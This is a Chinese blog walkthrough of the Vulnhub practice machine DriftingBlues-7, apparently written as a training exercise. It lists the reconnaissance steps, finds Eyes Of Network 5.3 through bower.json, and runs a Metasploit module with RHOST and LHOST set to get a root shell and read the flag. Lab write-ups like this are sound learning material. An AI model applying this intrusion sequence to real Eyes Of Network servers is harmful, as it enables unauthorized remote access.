当前位置:网站首页>看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
2022-06-25 10:16:00 【落寞的魚丶】
Vulnhub靶机DriftingBlues-7渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.144
这回开启的端口还挺多的 老样子先看一下80
端口页面发现是Eyes Of Network
(第一次见)
使用dirsearch
扫一下后台 但是没有搜到想要的结果 没有可以用的信息
这里是看到别人扫到了自己没扫到 也不知道为啥
访问:https://192.168.205.144/bower.json
发现了版本号 为 5.3
使用kali
搜索一下对应的相关漏洞:searchsploit Eyes Of Network 5.3
②:漏洞利用:
打开msf
搜索相关关键词Eyes Of Network
show options #查看需要设置的参数
set RHOST 192.168.205.144
set LHOST 192.168.205.133
run
进入shell
模式 cd /root
查看flag.txt
③:查看flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
感觉这个靶机 特别简单没有涉及到提权一些列操作 就是msf
的基本使用
DriftingBlues系列的第七个靶机了后继会继续更新,创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
边栏推荐
- Oracle query comes with JDK version
- 【系统分析师之路】第六章 复盘需求工程(综合知识概念)
- How to install SSL certificates in Microsoft Exchange 2010
- 单片机开发---基于ESP32-CAM的人脸识别应用
- 宏的运用接续符\
- 什么是 CRA
- Binder explanation of Android interview notes
- 2022-06-24:golang选择题,以下golang代码输出什么?A:1;B:3;C:4;D:编译失败。 package main import ( “fmt“ ) func mai
- IdentityServer4 定义概念
- Performance file system
猜你喜欢
ES 学习
【动态规划】—— 数字三角形
How to make a self-service order wechat applet? How to do the wechat order applet? visual editing
Flask blog practice - archiving and labeling of sidebar articles
Kotlin arrays and collections (1) {create arrays, use arrays, use for in loops to traverse arrays, use array indexes, and multi-dimensional arrays}
How to build a wechat applet? How to open an applet?
【论文阅读|深读】DRNE:Deep Recursive Network Embedding with Regular Equivalence
The path of Architects
[RPC] i/o model - Rector mode of bio, NiO, AIO and NiO
Handler asynchronous message processing
随机推荐
[paper reading | depth] role based network embedding via structural features reconstruction with degree regulated
Linked list delete nodes in the linked list
Requirements and precautions for applying for multi domain SSL certificate
XSS攻击
I hope to explain the basics of canvas as clearly as possible according to my ideas
我希望按照我的思路盡可能將canvas基礎講明白
Free applet making tool, how to make wechat applet
学会自学【学会学习本身,比学什么都重要】
ShardingSphere-Proxy 4.1 分庫分錶
Floating window --- create an activity floating window (can be dragged)
tokenizers>=0.11.1,!= 0.11.3,<0.13 is required for a normal functioning of this module,
Basic use and cluster construction of consult
keep-alive
Redis(二)分布式锁与Redis集群搭建
Kotlin implements a simple login page
Tutorial on installing SSL certificates in Microsoft Exchange Server 2007
Google Earth Engine(GEE)——evaluate實現一鍵批量下載研究區內的所有單張影像(上海市部分區域)
New school: no fraud Economics
MCU development -- face recognition application based on esp32-cam
Redis(一)原理与基本使用